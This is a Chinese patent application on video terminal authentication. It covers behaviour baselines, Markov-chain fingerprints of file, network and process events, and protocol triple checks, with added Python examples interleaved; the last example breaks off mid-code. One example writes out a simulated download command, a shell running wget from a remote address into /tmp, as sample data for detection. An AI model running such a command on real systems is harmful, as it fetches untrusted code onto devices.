Video terminal authentication control method, system and device
By establishing behavioral baselines and protocol parsing strategies on video terminals, and by monitoring access behavior in real time to calculate a behavioral deviation and a protocol verification result, the problems of "terminal unknowability" and "impersonation invisibility" in video terminal authentication control are solved, realizing intelligent multi-layer authentication processing and improving both security defense capability and operation and maintenance efficiency.
Patent Information
- Authority / Receiving Office
- CN · China
- Patent Type
- Applications(China)
- Current Assignee / Owner
- HANG ZHOU LING XIN SHU KE XIN XI JI SHU YOU XIAN GONG SI
- Filing Date
- 2026-05-21
- Publication Date
- 2026-06-19
AI Technical Summary
Existing video terminals suffer from "terminal unknowability", "impersonation invisibility" and "unintelligent policies" in security authentication control, so they cannot effectively defend against internal and external threats and adapt poorly to dynamic device access and changing business requirements.
By setting up behavior monitoring points on video terminals, constructing behavior baselines and protocol parsing strategies, monitoring access behavior in real time, generating behavior fingerprint data, calculating the behavioral deviation and the protocol verification result, and combining them with a three-layer priority authentication process, dual authentication control is achieved.
This effectively detects malicious file implantation and abnormal process activity, defends against unauthorized video access that exploits protocol vulnerabilities, resolves conflicts between multiple policies, and improves both the intelligence of security authentication and operational efficiency.
Figure CN122247761A_ABST
Abstract
Description
Technical Field
[0001] This invention relates to the field of video terminal authentication control, and in particular to a video terminal authentication control method, system and device.
Background Technology
[0002] Video surveillance systems communicate over a variety of protocols, and their communication authentication has the following security problems:
1. Firmware tampering detection of video terminals: existing techniques use simple MAC/IP address binding or pre-shared key authentication, which cannot defend against internal attacks launched from "legitimate terminals" that hold a valid identity but have been implanted with malicious code. Such techniques achieve only coarse-grained verification of "identity" and cannot establish the software integrity of the device itself or the trustworthiness of its runtime behavior. An attacker can therefore use a compromised terminal with a legitimate identity to launch malicious file operations, abnormal outbound connections, data theft and other attacks from inside the network, which is the internal-threat problem of "terminal unknowability".
2. Existing authentication and detection methods for video terminals recognize only a limited number of general-purpose protocols and lack deep parsing capability for the industry video protocols widely used in the power sector (such as GB/T 28181 and GB 35114) and for vendor-private protocols. They therefore cannot identify and filter advanced threats carried in protocol fields, such as malicious control commands (for example unauthorized PTZ control) and unauthorized video stream requests, and cannot perform compliance checks on the video content itself, which is the external-threat problem of "impersonation invisibility".
3. Configuration and management of existing authentication policies rely mainly on manual work and adapt poorly to dynamic device access and changing business requirements. Policy failure and policy redundancy ("zombie policies") are common, and the threat signature database lags behind rapidly evolving network attacks, which is the technical problem of "unintelligent policies".
[0003] In summary, existing video terminals still suffer from the technical problems of "terminal unknowability", "impersonation invisibility" and "unintelligent policies" in the security authentication and control process.
Summary of the Invention
[0004] In view of this, the purpose of this invention is to provide a video terminal authentication control method, system and device. The method performs dual authentication control from two levels of analysis: the behavioral deviation of the video terminal and the protocol verification result. By analyzing the behavioral deviation it detects the implantation of malicious files (malicious firmware) and abnormal process activity, solving the problem of "terminal unknowability". By analyzing the protocol verification result it effectively defends against illegal video access that exploits protocol vulnerabilities, solving the problem of "impersonation invisibility" of access behavior. In addition, the method schedules video terminals uniformly on the basis of the behavioral deviation and the protocol verification result, and resolves conflicts between multiple policies through a multi-level priority authentication process, solving the problem of "unintelligent policies".
[0005] In a first aspect, embodiments of the present invention provide a video terminal authentication control method, the method comprising: Based on the kernel environment parameters of the video terminal, behavior monitoring points are set, a behavior baseline is constructed by the attribute values of executable files in the system path of the video terminal, and the protocol parsing strategy is determined by the protocol feature bytes of the video terminal. The access behavior of video terminals is monitored in real time using behavior monitoring points, and behavior fingerprint data is generated by the continuous behavior sequence corresponding to the access behavior. The behavioral deviation between the behavioral fingerprint data and the behavioral baseline is calculated. The protocol verification result of the access behavior is obtained by parsing and verifying the protocol signaling of the access behavior using the protocol parsing strategy. The video terminal executes the authentication process by controlling behavioral deviation and protocol verification results.
[0006] Optionally, setting behavior monitoring points based on the kernel environment parameters of the video terminal includes: determining the kernel environment parameters from the system kernel type of the video terminal, and determining the file monitoring strategy and kernel communication strategy of the video terminal from the kernel environment parameters; determining the file write monitoring strategy, network connection monitoring strategy and process creation monitoring strategy of the video terminal from the file monitoring strategy and kernel communication strategy; and configuring the behavior monitoring points of the video terminal according to the file write monitoring strategy, network connection monitoring strategy and process creation monitoring strategy.
[0007] Optionally, constructing a behavioral baseline from the attribute values of executable files in the system directory of the video terminal includes: when the video terminal is detected to be in the firmware upgrade state or the first network access state, obtaining all executable files under the system path and business application path of the video terminal, together with the network data and manufacturer data of the video terminal; and constructing the behavioral baseline, indexed by the unique identifier of the video terminal, from the filename, version number and hash value in the attribute values of each executable file, the IP address and MAC address in the network data, and the corresponding ID value in the manufacturer data.
[0008] Optionally, determining the protocol parsing strategy from the protocol feature bytes of the video terminal includes: determining the public video protocol corresponding to the video terminal, and determining a first protocol parsing strategy from the first protocol feature bytes of the protocol feature field of that public video protocol; determining the private video protocol corresponding to the video terminal, determining an offset from the protocol type of the private video protocol, extracting the second protocol feature bytes at that offset with an n-gram algorithm, and determining a second protocol parsing strategy from the second protocol feature bytes; and determining the encrypted video protocol corresponding to the video terminal, decrypting preset key frames according to the boundary decryption proxy strategy and watermark audit strategy of the encrypted video protocol, and determining a third protocol parsing strategy from the generated digital watermark.
[0009] Optionally, monitoring the access behavior of the video terminal in real time with the behavior monitoring points and generating behavior fingerprint data from the continuous behavior sequence corresponding to the access behavior includes: monitoring the file write behavior, network connection behavior and process creation behavior of the video terminal in real time with the behavior monitoring points; determining the continuous behavior sequence corresponding to the access behavior from the execution order of the process creation, file write and network connection actions; and compressing the continuous behavior sequence into a behavior fingerprint vector with a Markov chain model, and generating the behavior fingerprint data of the access behavior from the hash value of the behavior fingerprint vector.
[0010] Optionally, calculating the behavioral deviation between the behavioral fingerprint data and the behavioral baseline includes: determining the calculation execution strategy for the behavioral baseline from the file modification timestamps corresponding to the behavioral fingerprint data; calculating the similarity comparison result between the behavioral fingerprint data and the behavioral baseline according to that calculation execution strategy; and determining the behavioral similarity between the behavioral fingerprint data and the behavioral baseline from the similarity comparison result, and calculating the behavioral deviation from the behavioral similarity.
[0011] Optionally, obtaining the protocol verification result of the access behavior by parsing and verifying the protocol signaling of the access behavior with the protocol parsing strategy includes: obtaining the protocol signaling of the access behavior, and determining the semantic parsing tree corresponding to the protocol signaling with the protocol parsing strategy; according to the network IP address corresponding to the protocol signaling, retrieving the operation type data, target resource data and operator data from the message body of the protocol signaling through the semantic parsing tree; and obtaining the protocol verification result of the access behavior from the triple formed by the operation type data, target resource data and operator data.
[0012] Optionally, controlling the video terminal to execute the authentication process according to the behavioral deviation and the protocol verification result includes: determining the deviation threshold and the protocol verification condition for the video terminal from the type parameters of the access behavior; if the behavioral deviation is greater than the deviation threshold and the protocol verification result does not satisfy the protocol verification condition, determining the authentication process to be the forced blocking authentication process; if the behavioral deviation is greater than the deviation threshold and the protocol verification result satisfies the protocol verification condition, determining the authentication process to be the behavior abnormality authentication process; if the behavioral deviation is not greater than the deviation threshold and the protocol verification result satisfies the protocol verification condition, determining the authentication process to be the operation continuation process; and controlling the video terminal to execute the determined authentication process, where the forced blocking authentication process has a higher priority than the behavior abnormality authentication process, which in turn has a higher priority than the operation continuation process.
[0013] In a second aspect, the present invention provides a video terminal authentication control system, comprising: an acquisition layer, used to set behavior monitoring points based on the kernel environment parameters of the video terminal, construct a behavior baseline from the attribute values of executable files in the system path of the video terminal, and determine the protocol parsing strategy from the protocol feature bytes of the video terminal; an access layer, used to monitor the access behavior of the video terminal in real time with the behavior monitoring points and generate behavior fingerprint data from the continuous behavior sequence corresponding to the access behavior; a control layer, used to calculate the behavioral deviation between the behavior fingerprint data and the behavior baseline, and to obtain the protocol verification result of the access behavior by parsing and verifying the protocol signaling of the access behavior with the protocol parsing strategy; and an application layer, used to control the video terminal to execute the authentication process according to the behavioral deviation and the protocol verification result.
[0014] In a third aspect, embodiments of the present invention also provide a video terminal authentication control device, which includes a processor and a memory. The memory stores computer-executable instructions that can be executed by the processor, and the processor executes the computer-executable instructions to implement the steps of the video terminal authentication control method provided in the first aspect.
[0015] This invention provides a video terminal authentication control method, system and device. During the authentication of a video terminal, the method first sets behavior monitoring points based on the kernel environment parameters of the video terminal, constructs a behavior baseline from the attribute values of executable files in the system path of the video terminal, and determines the protocol parsing strategy from the protocol feature bytes of the video terminal. It then uses the behavior monitoring points to monitor the access behavior of the video terminal in real time and generates behavior fingerprint data from the continuous behavior sequences corresponding to the access behavior. Next, it calculates the behavioral deviation between the behavior fingerprint data and the behavior baseline, and uses the protocol parsing strategy to parse and verify the protocol signaling of the access behavior to obtain the protocol verification result. Finally, it controls the video terminal to execute the authentication process according to the behavioral deviation and the protocol verification result. The method thus applies dual authentication control from two levels of analysis: behavioral deviation and protocol verification result. The behavioral deviation detects the implantation of malicious files (malicious firmware) and abnormal process activity, addressing the "terminal unknowability" problem. The protocol verification result defends against unauthorized video access that exploits protocol vulnerabilities, addressing the "impersonation invisibility" problem of access behavior. Furthermore, the method schedules video terminals uniformly on the basis of the behavioral deviation and the protocol verification result, and resolves conflicts between multiple policies through a multi-level priority authentication process, addressing the "unintelligent policies" problem.
[0016] Other features and advantages of the invention will be set forth in the description which follows, and will be apparent in part from the description, or may be learned by practicing the invention. The objects and other advantages of the invention are realized and obtained in accordance with the structures particularly pointed out in the description, claims and drawings.
[0017] To make the above-mentioned objects, features and advantages of the present invention more apparent and understandable, preferred embodiments are described below in detail with reference to the accompanying drawings.
Brief Description of the Drawings
[0018] To more clearly illustrate the specific embodiments of the present invention or the technical solutions in the prior art, the drawings used in the description of the specific embodiments or the prior art will be briefly introduced below. Obviously, the drawings described below are some embodiments of the present invention. For those skilled in the art, other drawings can be obtained from these drawings without creative effort.
[0019] Figure 1 is a flowchart of a video terminal authentication control method provided in an embodiment of the present invention; Figure 2 is a flowchart of another video terminal authentication control method provided in an embodiment of the present invention; Figure 3 is a schematic diagram of the structure of a video terminal authentication control system provided in an embodiment of the present invention; Figure 4 is a schematic diagram of another video terminal authentication control system provided in an embodiment of the present invention; Figure 5 is a schematic diagram of the structure of an electronic device provided in an embodiment of the present invention.
[0020] Reference numerals: 310 - Acquisition Layer; 320 - Access Layer; 330 - Control Layer; 340 - Application Layer; 101 - Processor; 102 - Memory; 103 - Bus; 104 - Communication Interface.
Detailed Description of the Embodiments
[0021] To make the objectives, technical solutions, and advantages of the embodiments of the present invention clearer, the technical solutions of the present invention will be clearly and completely described below in conjunction with the embodiments. Obviously, the described embodiments are only some embodiments of the present invention, not all embodiments. Based on the embodiments of the present invention, all other embodiments obtained by those skilled in the art without creative effort are within the scope of protection of the present invention.
[0022] To facilitate understanding of this embodiment, the video terminal authentication control method disclosed in this embodiment of the invention is introduced first. As shown in Figure 1, the method includes: Step S101: Set behavior monitoring points based on the kernel environment parameters of the video terminal, construct a behavior baseline from the attribute values of executable files in the system path of the video terminal, and determine the protocol parsing strategy from the protocol feature bytes of the video terminal.
[0023] Specifically, monitoring points for three key behaviors (file writing, network connection and process creation) can be set using the inotify and netlink mechanisms of the Linux kernel on the video terminal. When the video terminal first connects to the network or upgrades its firmware, the filenames, version numbers and SHA-256 hash values of the executable files in key system directories such as /bin, /sbin and /etc and in the business application paths are collected. Combined with the terminal's IP/MAC address and vendor information, a trusted software baseline and a dynamic behavior baseline are constructed. At the same time, general and industry-specific video protocol models such as GB/T 28181, GB 35114 and RTSP are pre-integrated. For unknown private protocols, the n-gram algorithm is used to extract feature bytes, and a protocol state machine is built with a sequence comparison algorithm, to determine the appropriate deep parsing and semantic verification strategy for each video protocol.
[0024] Step S102: Use behavior monitoring points to monitor the access behavior of video terminals in real time, and generate behavior fingerprint data through the continuous behavior sequence corresponding to the access behavior.
[0025] By deploying lightweight security probes on video terminals, the system monitors access behaviors such as writing sensitive files, adding new TCP / UDP connections, and creating new processes in real time using preset key behavior monitoring points. Instead of collecting full behavior logs, the system compresses the monitored continuous behavior sequences into behavior fingerprint vectors using a Markov chain model to generate terminal behavior fingerprint data.
[0026] Step S103: Calculate the behavioral deviation between the behavioral fingerprint data and the behavioral baseline, and obtain the protocol verification result of the access behavior by parsing and verifying the protocol signaling of the access behavior using the protocol parsing strategy.
[0027] The generated behavioral fingerprint data is compared with pre-built trusted software baselines and dynamic behavioral baselines to calculate the behavioral deviation between the two and identify terminal anomalies such as firmware tampering, abnormal processes, and malicious external connections. At the same time, a predetermined protocol parsing strategy is adopted to perform deep parsing of the video protocol signaling corresponding to the access behavior. The "operation type + target resource + operator" triple is extracted through semantic parsing tree to complete the permission and compliance verification. Boundary decryption proxy and digital watermark audit are performed simultaneously on the encrypted video stream to finally obtain the protocol verification result of the access behavior.
[0028] Step S104: Control the video terminal to execute the authentication process based on the behavior deviation and protocol verification results.
[0029] By integrating behavioral deviation and protocol verification results, and relying on a three-layer priority policy system (L1 forced blocking, L2 abnormal behavior, L3 continuous operation), the system controls the video terminal to perform authentication processing. When the behavioral deviation exceeds the standard or the protocol verification fails, automatic blocking, alarm prompts, or manual review are executed according to the priority rules, while normal access behavior is directly allowed. At the same time, the authentication results are synchronized to the intelligent policy center to optimize the behavioral baseline and protocol parsing policy, and clean up redundant policies to form an automated operation and maintenance closed loop.
[0030] Optionally, behavior monitoring points can be set based on the kernel environment parameters of the video terminal, including the following steps: Step S201: Determine the kernel environment parameters based on the system kernel type of the video terminal, and determine the file monitoring strategy and kernel communication strategy of the video terminal through the kernel environment parameters.
[0031] Step S202: Determine the file write monitoring strategy, network connection monitoring strategy, and process creation monitoring strategy of the video terminal using file monitoring strategy and kernel communication strategy; Step S203: Set up behavior monitoring points for the video terminal based on file writing monitoring strategy, network connection monitoring strategy, and process creation monitoring strategy.
[0032] In the specific execution process, the appropriate kernel environment parameters are first determined based on the type of Linux system kernel running on the video terminal. Based on these kernel environment parameters, the native inotify file monitoring mechanism and netlink kernel communication mechanism of the Linux kernel are enabled. This determines the lightweight file monitoring strategy and kernel-mode communication strategy of the video terminal, ensuring that the monitoring operation does not consume too much terminal CPU and bandwidth resources.
[0033] Then, based on the established file monitoring and kernel communication strategies, further refine the file writing monitoring strategy, network connection monitoring strategy, and process creation monitoring strategy for the video terminal, clarify the monitoring scope, collection rules, and triggering conditions of each strategy, abandon the full system call collection mode, and focus only on monitoring key abnormal behaviors.
[0034] For example, file write monitoring strategy: only monitor write events to sensitive paths such as /etc, /bin and the application directories. Network connection monitoring strategy: monitor only newly added outbound TCP/UDP connections (ignore state changes of established connections). Process creation monitoring strategy: capture the new process name and arguments from the execve event, and ignore thread creation.
[0035] Finally, based on the three specific monitoring strategies of file writing, network connection, and process creation, key behavior monitoring points are set in the lightweight security probe of the video terminal to achieve targeted monitoring of three core behaviors: writing to sensitive paths of the terminal, adding external connections, and creating new processes.
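As an added example (not the patent's own code) of the three monitoring strategies refined in steps S201-S203 and illustrated in [0034], the following Python applies them to a constructed stream of raw events of the kind an inotify/netlink probe would deliver. The event field names, the /opt/app application directory and all addresses and paths are assumptions of this example:

```python
"""Three monitoring strategies ([0034]) applied to a constructed raw event stream.
Added example; event field names and values are assumptions, not the patent's."""

# Only writes under sensitive paths are kept. /opt/app is an assumed application dir.
SENSITIVE_PREFIXES = ("/etc/", "/bin/", "/sbin/", "/opt/app/")

# Constructed raw events. IN_CLOSE_WRITE and IN_OPEN are real inotify event names;
# the net/proc records mimic what a netlink-based probe would report.
RAW_EVENTS = [
    {"kind": "file", "op": "IN_CLOSE_WRITE", "path": "/etc/passwd"},
    {"kind": "file", "op": "IN_CLOSE_WRITE", "path": "/tmp/cache.bin"},
    {"kind": "file", "op": "IN_OPEN", "path": "/bin/busybox"},
    {"kind": "net", "op": "new", "proto": "tcp", "dir": "out", "dst": "203.0.113.7:4444"},
    {"kind": "net", "op": "state", "proto": "tcp", "dir": "out", "dst": "203.0.113.7:4444"},
    {"kind": "net", "op": "new", "proto": "tcp", "dir": "in", "dst": "10.0.0.21:554"},
    {"kind": "proc", "op": "exec", "pid": 1201, "ppid": 1,
     "argv": ["sh", "-c", "wget http://203.0.113.7/x -O /tmp/x"]},
    {"kind": "proc", "op": "clone", "pid": 1300, "ppid": 1200, "flags": "CLONE_THREAD"},
]


def file_write_strategy(ev):
    """Keep completed writes to sensitive paths; ignore reads and other paths."""
    return ev["op"] == "IN_CLOSE_WRITE" and ev["path"].startswith(SENSITIVE_PREFIXES)


def net_connection_strategy(ev):
    """Keep newly added outbound TCP/UDP connections; ignore state changes and inbound."""
    return ev["op"] == "new" and ev["dir"] == "out" and ev["proto"] in ("tcp", "udp")


def process_creation_strategy(ev):
    """Keep execve events only; clone() with CLONE_THREAD is thread creation and is ignored."""
    return ev["op"] == "exec"


def apply_monitoring_points(events):
    """Return the normalised (behaviour, detail) records that pass the three strategies,
    in arrival order. This ordered list is the continuous behaviour sequence that the
    later fingerprinting step consumes."""
    kept = []
    for ev in events:
        if ev["kind"] == "file" and file_write_strategy(ev):
            kept.append(("write", ev["path"]))
        elif ev["kind"] == "net" and net_connection_strategy(ev):
            kept.append(("connect", f'{ev["proto"]}://{ev["dst"]}'))
        elif ev["kind"] == "proc" and process_creation_strategy(ev):
            kept.append(("exec", " ".join(ev["argv"])))
    return kept


if __name__ == "__main__":
    for behaviour, detail in apply_monitoring_points(RAW_EVENTS):
        print(behaviour, detail)
```

Of the eight raw events, three survive: the write to /etc/passwd, the new outbound connection to port 4444, and the execve of the shell running wget. Dropping the connection state change and the thread creation keeps the surviving sequence about intent rather than kernel noise, which is what [0033] means by abandoning full system call collection. As [0034] specifies, only outbound connections are kept by this monitoring point.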
[0036] Optionally, constructing a behavioral baseline from the attribute values of executable files in the system directory of the video terminal includes the following steps: Step S301: When the video terminal is detected to be in the firmware upgrade state or the first network access state, obtain all executable files under the system path and business application path of the video terminal, and obtain the network data and manufacturer data of the video terminal. Step S302: Using the filename, version number and hash value in the attribute values of each executable file, together with the IP address and MAC address in the network data and the ID value corresponding to the manufacturer data, construct the behavioral baseline indexed by the unique identifier of the video terminal.
[0037] Specifically, when a video terminal is detected registering on the network for the first time or upgrading its firmware version, the terminal's lightweight security probe initiates a data collection process to obtain all executable files in the terminal's critical system paths (/bin, /sbin) and dedicated business application paths, while simultaneously collecting the terminal's network data (IP address, MAC address) and device manufacturer identification data.
[0038] Then, the filename, version number, and SHA-256 hash value of the executable file are extracted as core attribute features. Combined with the terminal IP address, MAC address, and vendor ID information, and using the unique identifier of the video terminal as an index, a trusted software behavior baseline exclusive to the terminal is constructed as the benchmark for subsequent trusted verification of terminal behavior.
[0039] Optionally, the protocol parsing strategy can be determined by analyzing the protocol feature bytes of the video terminal, including the following steps: Step S401: Determine the public video protocol corresponding to the video terminal, and determine the first protocol parsing strategy through the first protocol feature byte corresponding to the protocol feature field of the public video protocol; Step S402: Determine the private video protocol corresponding to the video terminal, determine the offset bit using the protocol type of the private video protocol, extract the second protocol feature byte of the offset bit according to the n-gram algorithm, and determine the second protocol parsing strategy through the second protocol feature byte; Step S403: Determine the encrypted video protocol corresponding to the video terminal, decrypt the preset keyframes according to the boundary decryption proxy strategy and watermark audit strategy of the encrypted video protocol, and then use the generated digital watermark to determine the third protocol parsing strategy.
[0040] First, identify the public video protocols used by the video terminal (including general video protocols such as GB/T 28181, GB 35114, RTSP, RTMP and SIP, and industry-specific protocols such as MQTT). Based on the first protocol feature bytes of the feature field of each such standard protocol, match the pre-integrated complete protocol model, determine the first protocol parsing strategy adapted to the public protocol, and parse standard protocol signaling directly.
[0041] Then, identify the private video protocol traffic transmitted by the video terminal, locate the fixed feature offset of the private protocol, extract the second protocol feature bytes at that offset with the n-gram algorithm, identify the protocol handshake interaction pattern with a sequence comparison algorithm and build the protocol state machine automatically, and from these determine the second protocol parsing strategy for reverse parsing of the private protocol and detection of illegal state transitions.
[0042] Finally, for encrypted video protocols used by video terminals (such as GB 35114 encrypted video streams), a boundary decryption proxy strategy and a watermark audit strategy are enabled to decrypt the protocol signaling and video key frame headers, extract and verify digital watermarks to defend against video replay attacks, and a third protocol parsing strategy adapted to encrypted video streams is determined based on this security processing logic.
[0043] Optionally, monitoring the access behavior of the video terminal in real time with the behavior monitoring points and generating behavior fingerprint data from the continuous behavior sequence corresponding to the access behavior includes the following steps: Step S501: Use the behavior monitoring points to monitor the file write behavior, network connection behavior and process creation behavior of the video terminal in real time. Step S502: Determine the continuous behavior sequence corresponding to the access behavior from the execution order of the process creation, file write and network connection actions. Step S503: Compress the continuous behavior sequence into a behavior fingerprint vector with a Markov chain model, and use the hash value of the behavior fingerprint vector to generate the behavior fingerprint data of the access behavior.
[0044] The above steps first rely on three key behavior monitoring points: file writing, network connection and process creation. Based on the inotify and netlink mechanisms of the Linux kernel, they monitor the video terminal's access behaviors in real time, including writes to sensitive paths, new outbound TCP/UDP connections and new process creation, while ignoring non-critical behaviors such as state changes of established connections and thread creation.
[0045] Then, from the actual sequence of process creation, file write and network connection behaviors executed by the video terminal, the continuous behavior sequence corresponding to the current access behavior is assembled, so that the full chain of execution is reconstructed.
[0046] Subsequently, the continuous behavioral sequence is compressed into a lightweight behavioral fingerprint vector using a Markov chain model. The hash value of this vector is calculated and used to generate behavioral fingerprint data. Only the fingerprint hash value is uploaded instead of the original behavioral log, which greatly reduces the amount of data transmission.
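Steps S502-S503 can be made concrete with the following Python, an added example and not the patent's code. It builds a first-order Markov transition matrix over the three monitored behaviour types, flattens and quantises it into the fingerprint vector, and hashes that vector; the two event sequences, the first-order model, the quantisation scale and the cosine similarity used to compare two vectors are choices of this example:

```python
"""Markov-chain behaviour fingerprint (S503). Added example; sequences are constructed."""
import hashlib
import math

STATES = ("exec", "write", "connect")
INDEX = {s: i for i, s in enumerate(STATES)}


def transition_matrix(sequence):
    """Row-stochastic first-order transition matrix over STATES."""
    counts = [[0] * len(STATES) for _ in STATES]
    for a, b in zip(sequence, sequence[1:]):
        counts[INDEX[a]][INDEX[b]] += 1
    matrix = []
    for row in counts:
        total = sum(row)
        matrix.append([c / total if total else 0.0 for c in row])
    return matrix


def fingerprint_vector(sequence, scale=100):
    """Flatten the matrix and quantise each probability to an integer 0..scale, so the
    vector is byte-exact across machines before it is hashed."""
    return [round(p * scale) for row in transition_matrix(sequence) for p in row]


def fingerprint_hash(vector):
    """Behaviour fingerprint data: SHA-256 of the quantised vector (what is uploaded)."""
    return hashlib.sha256(bytes(vector)).hexdigest()


def deviation(vec_a, vec_b):
    """1 - cosine similarity of two fingerprint vectors (0.0 means identical behaviour)."""
    dot = sum(a * b for a, b in zip(vec_a, vec_b))
    norm = math.sqrt(sum(a * a for a in vec_a)) * math.sqrt(sum(b * b for b in vec_b))
    return 1.0 - dot / norm if norm else 1.0


# Constructed sequences from the three monitoring points of a camera.
BASELINE_SEQ = ["exec", "write", "connect", "write", "connect", "write", "connect"]
# A download-and-execute chain: exec -> connect -> exec -> write -> exec ...
SUSPECT_SEQ = ["exec", "connect", "exec", "write", "exec", "connect", "write"]

if __name__ == "__main__":
    base, suspect = fingerprint_vector(BASELINE_SEQ), fingerprint_vector(SUSPECT_SEQ)
    print(base, fingerprint_hash(base))
    print(suspect, fingerprint_hash(suspect), deviation(base, suspect))
```

The baseline sequence yields the vector [0, 100, 0, 0, 0, 100, 0, 100, 0] and the suspect sequence [0, 33, 67, 100, 0, 0, 50, 50, 0]; their hashes differ and the cosine deviation is about 0.67. Two points matter in practice. Quantising before hashing is what makes the hash reproducible; hashing raw floats would let rounding noise change the fingerprint. And because a hash is either equal to the stored baseline hash or not, the graded deviation of [0010] needs the vector itself (or the probe must send it on a hash mismatch); the hash alone only answers "same as baseline or not".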
[0047] Optionally, calculating the behavioral deviation between the behavioral fingerprint data and the behavioral baseline includes the following steps: Step S601: Determine the calculation execution strategy for the behavioral baseline using the file modification timestamps corresponding to the behavioral fingerprint data; Step S602: Calculate the similarity comparison results between the behavioral fingerprint data and the behavioral baseline based on the calculation execution strategy; Step S603: Determine the behavioral similarity between the behavioral fingerprint data and the behavioral baseline through the similarity comparison results, and calculate the behavioral deviation based on the behavioral similarity.
[0048] In the specific implementation process, the file modification timestamp corresponding to the behavior fingerprint data is first used to distinguish whether the video terminal is in the full baseline verification scenario (after first network access / firmware upgrade) or in the lightweight verification scenario of daily inspection. The calculation execution strategy for the behavior baseline (full hash comparison or fast timestamp comparison) is determined accordingly, so that repeated hash calculation does not occupy terminal resources.
[0049] Then, according to the predetermined calculation and execution strategy, the behavioral fingerprint data uploaded by the terminal is matched and compared with the pre-stored trusted software baseline and dynamic behavioral baseline to obtain the similarity comparison results between the two.
[0050] Finally, the behavioral similarity between the behavioral fingerprint data and the behavioral baseline is quantified based on the similarity comparison results. The behavioral deviation is calculated using behavioral similarity as the core indicator to determine whether the terminal has any trust anomalies such as firmware tampering, abnormal processes, or malicious external connections.
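The fingerprint generation of steps S501 to S503 and the strategy selection and deviation calculation of steps S601 to S603, as an added Python example that is not part of the patent. The event alphabet, the cosine similarity measure, the rule that the vector itself is only uploaded in the full verification scenario, and the sample sequences are assumptions.

```python
import hashlib
from itertools import product

# Constructed example (not the patent's own code) for paragraphs [0043]-[0050]:
# the terminal side builds the Markov-chain fingerprint and uploads its hash;
# the gateway side picks the verification strategy from file timestamps and
# turns similarity into a deviation score. The event alphabet, cosine
# similarity and "deviation = 1 - similarity" are assumptions.

EVENTS = ("process_create", "file_write", "net_connect")   # monitoring points


def fingerprint_vector(sequence):
    """Step S503: compress a continuous behavior sequence into a first-order
    Markov transition-probability vector (row-major over the 3x3 event pairs)."""
    counts = {pair: 0 for pair in product(EVENTS, repeat=2)}
    for cur, nxt in zip(sequence, sequence[1:]):
        if cur not in EVENTS or nxt not in EVENTS:
            raise ValueError(f"event outside the monitoring points: {cur}/{nxt}")
        counts[(cur, nxt)] += 1
    vec = []
    for cur in EVENTS:
        row_total = sum(counts[(cur, nxt)] for nxt in EVENTS)
        for nxt in EVENTS:
            vec.append(counts[(cur, nxt)] / row_total if row_total else 0.0)
    return vec


def fingerprint_hash(vec):
    """Hash the quantised vector: only this digest has to leave the terminal."""
    quantised = ",".join(f"{x:.3f}" for x in vec)
    return hashlib.sha256(quantised.encode()).hexdigest()


def terminal_upload(sequence, file_mtime, include_vector):
    """What the terminal agent sends. The vector is only included in the full
    verification scenario (assumption); daily checks send hash + mtime only."""
    vec = fingerprint_vector(sequence)
    upload = {"hash": fingerprint_hash(vec), "mtime": file_mtime}
    if include_vector:
        upload["vec"] = vec
    return upload


def choose_strategy(upload_mtime, baseline_mtime):
    """Step S601: files modified after the baseline was built (first access or
    firmware upgrade) force a full hash comparison; otherwise the fast
    timestamp comparison avoids re-hashing on the terminal."""
    return "full_hash" if upload_mtime > baseline_mtime else "fast_timestamp"


def cosine_similarity(u, v):
    dot = sum(a * b for a, b in zip(u, v))
    norm_u = sum(a * a for a in u) ** 0.5
    norm_v = sum(b * b for b in v) ** 0.5
    return dot / (norm_u * norm_v) if norm_u and norm_v else 0.0


def behavior_deviation(upload, baseline):
    """Steps S602-S603. Returns (strategy, similarity, deviation)."""
    strategy = choose_strategy(upload["mtime"], baseline["mtime"])
    if upload["hash"] in baseline["trusted_hashes"]:
        similarity = 1.0          # exact match with a trusted fingerprint
    elif strategy == "fast_timestamp" or "vec" not in upload:
        similarity = 0.0          # unknown hash and no vector: treat as fully deviating
    else:
        similarity = cosine_similarity(upload["vec"], baseline["vec"])
    return strategy, similarity, round(1.0 - similarity, 4)


# Constructed sequences: a normal camera start-up, and one with an unexpected
# process-spawn / outbound-connection loop.
NORMAL = ["process_create", "file_write", "net_connect", "file_write", "net_connect"]
SUSPECT = ["process_create", "net_connect", "process_create", "net_connect", "file_write"]

BASELINE = {
    "mtime": 1_700_000_000,
    "vec": fingerprint_vector(NORMAL),
    "trusted_hashes": {fingerprint_hash(fingerprint_vector(NORMAL))},
}

if __name__ == "__main__":
    for seq, mtime in ((NORMAL, 1_699_000_000), (SUSPECT, 1_700_100_000)):
        up = terminal_upload(seq, mtime, include_vector=mtime > BASELINE["mtime"])
        print(seq[0], "...", behavior_deviation(up, BASELINE))
```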
[0051] Optionally, parsing and verifying the protocol signaling of the access behavior using the protocol parsing strategy to obtain the protocol verification result of the access behavior includes the following steps: Step S701: Obtain the protocol signaling of the access behavior, and use the protocol parsing strategy to determine the semantic parsing tree corresponding to the protocol signaling; Step S702: According to the network IP address corresponding to the protocol signaling, parse the operation type data, target resource data, and operator data from the message body of the protocol signaling through the semantic parsing tree; Step S703: Obtain the protocol verification result of the access behavior through the triple formed by the operation type data, target resource data, and operator data.
[0052] First, the video protocol signaling corresponding to the access behavior is obtained (including the XML / SDP signaling in the SIP message body). Based on the three types of protocol parsing strategies (public protocol, private protocol, and encrypted protocol), the protocol signaling is converted into a signaling semantic parse tree (SST), providing structured support for the deep semantic decomposition of the protocol signaling.
[0053] Then, using the video terminal IP address associated with the access behavior as an index, the protocol signaling message body is parsed through the signaling semantic parsing tree to accurately extract three core data items: operation type, target resource, and operator, thereby clarifying the operation permissions, resource type (real-time video stream, historical recording, audio), and operation subject information of the access behavior.
[0054] Finally, the operation type, target resource, and operator data are combined into an access control triple. The triple is then validated according to preset security permissions and compliance rules to determine whether there are any anomalies such as unauthorized PTZ control, unauthorized video retrieval, or unauthorized resource access. Ultimately, a protocol validation result for the access behavior is generated, achieving precise resource-level access control.
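Steps S701 to S703 for the public-protocol branch, as an added Python example that is not part of the patent: a GB/T 28181 MANSCDP XML command carried in a SIP MESSAGE is turned into a small semantic tree, reduced to the operation type / target resource / operator triple, and checked against a permission table indexed by the operator and its expected IP address. The device IDs, permission table, operator-to-IP index and CmdType mapping are assumptions, and the flat dict stands in for the patent's SST.

```python
import re
import xml.etree.ElementTree as ET

# Constructed example (not the patent's own code) for paragraphs [0051]-[0054],
# public-protocol branch only. Device IDs, the permission table, the
# operator-to-IP index and the CmdType mapping are assumptions.

OPERATION_TYPES = {          # CmdType -> operation type (GB/T 28181 command names)
    "DeviceControl": "ptz_control",
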